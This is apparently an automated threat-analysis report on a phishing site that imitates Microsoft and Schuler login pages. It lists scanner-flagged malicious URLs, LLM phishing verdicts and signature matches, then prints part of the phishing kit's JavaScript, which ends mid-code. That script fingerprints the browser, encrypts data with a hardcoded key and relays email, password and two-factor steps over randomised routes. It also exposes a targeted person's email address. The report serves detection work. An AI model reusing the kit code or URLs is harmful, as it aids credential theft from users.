Source: https://vkwek.ckyucle.com/opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/12TvEGAMcd3aPS6720 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180 |
Avira URL Cloud: Label: malware |
Source: https://nzd92.6gniu68.ru/5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/2DUx/ |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/56NViOjdyBE66K4aemhQsnnijWU2q89KCdOOZ89106 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/favicon.ico |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/2DUx/#- |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/78l8NmRVxJ45fjuJRst60 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/45TplGCNDXCptZb896Wyz84jpQxy69 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/90YOSnhY5T8JbcpfefM5jeqjHMc7G9ab72 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/qr6FfLhLZ5QwaGe5HJsDHUaandv4RUef6Ia8VBkiV1U467140 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/yzBt71gp856BSdkJ4Qop47 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/pqJEZxAGJZqUBhc85R9yzrCUwx40 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/2DUx/?W-crystal.begin@schulergroup.com |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/xy12R7tzrssHzef25 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/wpn0pH3CIM5nU02jRmQ0L1Y1phPSwbSM0ag |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com/ef6ywsH6ValAwIHzgds78wUwuLf89smkl92 |
Avira URL Cloud: Label: malware |
Source: https://vkwek.ckyucle.com |
LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://vkwek.ckyucle.com' does not match the legitimate domain 'microsoft.com' associated with the brand Microsoft. The presence of a prominent login form asking for email credentials is a common phishing tactic. The domain name appears suspicious and unrelated to Microsoft, indicating potential phishing. The image resembles a legitimate Microsoft login page, which is a social engineering technique to mislead users. Additionally, the presence of a suspicious link ('No account? Create one!') that could potentially lead to a harmful page further supports the phishing suspicion. DOM: 2.5.pages.csv |
Source: https://vkwek.ckyucle.com |
LLM: Score: 9 brands: Schuler Reasons: The URL 'https://vkwek.ckyucle.com' does not match the legitimate domain 'schulergroup.com' associated with the Schuler brand. The presence of a prominent login form asking for a password is a common phishing tactic. The domain name is highly suspicious and does not align with the legitimate domain. The use of social engineering techniques is evident as the site mimics a legitimate login page to deceive users into entering their credentials. Additionally, the link to 'Forgot my password' could potentially lead to further phishing attempts. DOM: 2.7.pages.csv |
Source: Yara match |
File source: 2.5.pages.csv, type: HTML |
Source: Yara match |
File source: 2.6.pages.csv, type: HTML |
Source: Yara match |
File source: 2.7.pages.csv, type: HTML |
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs |
Matcher: Found strong image similarity, brand: MICROSOFT |
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs |
Matcher: Template: microsoft matched |
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs |
Matcher: Template: microsoft matched |
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal |
Matcher: Template: captcha matched |
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal |
Matcher: Template: captcha matched |
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs |
HTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "XkpxX";var emailcheck = "crystal.begin@schulergroup.com";var webname = "rtrim(/web8/, '/')";var urlo = "rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2";var gdf = "ijG4yW3R7FY813hQeumBEAUyzYJiiCY97PHkccd114";var odf = "ghU2EPAQmKCucHi9wxct32lto7kIab643";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome|chromium|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false || route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq|rs)[A-Za-z0-9]{6,18}(yz|12|34)[A-Za-z0-9]{2,7}(uv|wx)(3[1-9]|40)/gm;}if(route == "checkpass"){randpattern = 
/(yz|12)[A-Za-z0-9]{7,14}(56|78)[A-Za-z0-9]{3,8}(op|qr)(4[1-9]|50)/gm;}if(route == "twofaselect"){randpattern = /(56|78|90)[A-Za-z0-9]{8,16}(23|45|67)[A-Za-z0-9]{4,9}(st|uv)(5[1-9]|60)/gm;}if(route == "twofaselected"){randpattern = /(23|45)[A-Za-z0-9]{9,20}(89|90|ab)[A-Za-z0-9]{5,10}(vw|xy)(6[1-9]|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(r |